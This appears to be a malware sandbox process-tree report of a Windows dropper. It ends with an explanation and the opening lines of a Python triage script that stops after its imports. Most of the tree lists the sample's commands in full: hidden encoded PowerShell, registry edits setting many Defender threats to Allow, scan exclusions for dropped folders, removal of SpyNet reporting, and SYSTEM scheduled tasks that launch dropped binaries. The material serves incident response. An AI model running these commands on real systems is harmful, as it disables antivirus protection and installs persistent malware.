C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvffOywEAsomCrOclN" /SC once /ST 07:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF\lJBlQvjZsVtqrIl\XzswOIF.exe\" Bp /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3112
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1428
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3256
-
C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF\lJBlQvjZsVtqrIl\XzswOIF.exeC:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF\lJBlQvjZsVtqrIl\XzswOIF.exe Bp /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:228
[depth 3, PID 2136] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
  - Suspicious use of WriteProcessMemory
[depth 4, PID 4760] C:\Windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
[depth 3, PID 4568] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
[depth 3, PID 3696] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
[depth 3, PID 3508] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
[depth 3, PID 3168] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
[depth 3, PID 3176] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
[depth 3, PID 3548] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
[depth 3, PID 3828] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
[depth 3, PID 4620] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
[depth 3, PID 3588] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
[depth 3, PID 3216] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
[depth 3, PID 548] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
[depth 3, PID 3424] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
[depth 3, PID 4208] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
[depth 3, PID 5112] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
[depth 3, PID 1212] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
[depth 3, PID 4400] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
[depth 3, PID 1160] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
[depth 3, PID 1684] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
[depth 3, PID 1404] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
[depth 3, PID 4508] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
[depth 3, PID 3100] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
[depth 3, PID 3408] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
[depth 3, PID 988] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
[depth 2, PID 4664] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\InaIvrjBgGxU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\InaIvrjBgGxU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bNrcflyMMmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bNrcflyMMmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pGMaoMOmU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pGMaoMOmU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zjyBtxSiMuSUC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zjyBtxSiMuSUC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uOKUZcIdbhBstHVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uOKUZcIdbhBstHVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\jWXQtFKEfMKfhKUF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\jWXQtFKEfMKfhKUF\" /t REG_DWORD /d 0 /reg:64;"
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
[depth 3, PID 4644] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR" /t REG_DWORD /d 0 /reg:32
[depth 4, PID 4740] C:\Windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR" /t REG_DWORD /d 0 /reg:32
[depth 3, PID 4952] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR" /t REG_DWORD /d 0 /reg:64
[depth 3, PID 4280] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\InaIvrjBgGxU2" /t REG_DWORD /d 0 /reg:32
[depth 3, PID 2264] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\InaIvrjBgGxU2" /t REG_DWORD /d 0 /reg:64
[depth 3, PID 4384] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNrcflyMMmUn" /t REG_DWORD /d 0 /reg:32
[depth 3, PID 2332] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNrcflyMMmUn" /t REG_DWORD /d 0 /reg:64
[depth 3, PID 1284] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pGMaoMOmU" /t REG_DWORD /d 0 /reg:32
[depth 3, PID 1676] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pGMaoMOmU" /t REG_DWORD /d 0 /reg:64
[depth 3, PID 3988] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zjyBtxSiMuSUC" /t REG_DWORD /d 0 /reg:32
[depth 3, PID 3596] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zjyBtxSiMuSUC" /t REG_DWORD /d 0 /reg:64
[depth 3, PID 2824] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uOKUZcIdbhBstHVB /t REG_DWORD /d 0 /reg:32
[depth 3, PID 1188] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uOKUZcIdbhBstHVB /t REG_DWORD /d 0 /reg:64
[depth 3, PID 4440] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF /t REG_DWORD /d 0 /reg:32
[depth 3, PID 1492] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF /t REG_DWORD /d 0 /reg:64
[depth 3, PID 3080] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\jWXQtFKEfMKfhKUF /t REG_DWORD /d 0 /reg:32
[depth 3, PID 1836] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\jWXQtFKEfMKfhKUF /t REG_DWORD /d 0 /reg:64
[depth 2, PID 4660] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gToLbSxfR" /SC once /ST 05:08:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  (the -EncodedCommand payload is base64 over UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
  - Creates scheduled task(s)
[depth 2, PID 4268] C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gToLbSxfR"
[depth 2, PID 2180] C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gToLbSxfR"
[depth 2, PID 1432] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "aClwDgKsxBQnbYjuF" /SC once /ST 02:01:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\jWXQtFKEfMKfhKUF\oqxfaZHkGcGvUMP\UuEaWBB.exe\" dn /site_id 525403 /S" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)
[depth 2, PID 4508] C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "aClwDgKsxBQnbYjuF"
[depth 1, PID 4260] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  (same encoded payload as the gToLbSxfR task, i.e. start-process -WindowStyle Hidden gpupdate.exe /force; the gpupdate.exe child below is that command firing)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
[depth 2, PID 1192] C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
[depth 1, PID 4700] C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
[depth 1, PID 3828] C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
[depth 1, PID 3816] C:\Windows\Temp\jWXQtFKEfMKfhKUF\oqxfaZHkGcGvUMP\UuEaWBB.exe
  C:\Windows\Temp\jWXQtFKEfMKfhKUF\oqxfaZHkGcGvUMP\UuEaWBB.exe dn /site_id 525403 /S
  - Executes dropped EXE
  - Checks computer location settings
  - Drops Chrome extension
  - Drops desktop.ini file(s)
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
[depth 2, PID 2000] C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bvffOywEAsomCrOclN"
[depth 2, PID 2348] C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
[depth 3, PID 1552] C:\Windows\SysWOW64\reg.exe
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
[depth 2, PID 5104] C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
[depth 3, PID 3036] C:\Windows\SysWOW64\reg.exe
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
[depth 2, PID 2264] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\pGMaoMOmU\gqYIPc.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yKRLlrVxZRCwfvY" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)
[depth 2, PID 2012] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "yKRLlrVxZRCwfvY2" /F /xml "C:\Program Files (x86)\pGMaoMOmU\PNLEqsS.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
[depth 2, PID 1944] C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "yKRLlrVxZRCwfvY"
[depth 2, PID 3956] C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "yKRLlrVxZRCwfvY"
[depth 2, PID 3088] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "xMldJvduBHIruY" /F /xml "C:\Program Files (x86)\InaIvrjBgGxU2\eyuRBEh.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
[depth 2, PID 4824] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "AoZZmzTUnslpJ2" /F /xml "C:\ProgramData\uOKUZcIdbhBstHVB\BVPCvev.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
[depth 2, PID 1744] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "WzbfXanLtYYyBKpOR2" /F /xml "C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR\xSwKdTD.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
[depth 2, PID 2112] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "LdHJZpmEfCRWAMVLKFS2" /F /xml "C:\Program Files (x86)\zjyBtxSiMuSUC\IGhrHkk.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
[depth 2, PID 4688] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "GqChQHaYBumcgGPDT" /SC once /ST 01:15:52 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\jWXQtFKEfMKfhKUF\WiMWxCzJ\ShjzraF.dll\",#1 /site_id 525403" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)
[depth 2, PID 2652] C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "GqChQHaYBumcgGPDT"
[depth 2, PID 3164] C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
[depth 3, PID 4752] C:\Windows\SysWOW64\reg.exe
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
[depth 2, PID 3504] C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
[depth 3, PID 4408] C:\Windows\SysWOW64\reg.exe
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
[depth 2, PID 4372] C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "aClwDgKsxBQnbYjuF"
[depth 1, PID 3076] C:\Windows\system32\rundll32.EXE
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jWXQtFKEfMKfhKUF\WiMWxCzJ\ShjzraF.dll",#1 /site_id 525403
[depth 2, PID 4692] C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jWXQtFKEfMKfhKUF\WiMWxCzJ\ShjzraF.dll",#1 /site_id 525403
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Enumerates system info in registry
[depth 3, PID 2636] C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "GqChQHaYBumcgGPDT"
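The tree above is the raw record. What a responder wants pulled out of it is the list of Defender threat IDs whose default action was switched to Allow, the directories excluded from scanning, the SpyNet reporting value removed, the tasks registered to run as SYSTEM, the create/run/delete pattern that uses a task as a one-shot launcher, and the plaintext behind the -EncodedCommand payload. The Python below does that over a constructed subset of the command lines copied from the tree. It is an added example written for this page, not part of the sandbox report or of the sample; the category labels are its own, and the ThreatAction table is the enumeration documented for Set-MpPreference -ThreatIDDefaultAction, in which 6 means Allow.

```python
"""Triage of the command lines recorded in the process tree above.

Added example for this page; not part of the sandbox report or of the sample.
COMMANDS is a constructed subset of the command lines visible in the tree and
the category labels are this example's own.
"""
import base64
import re

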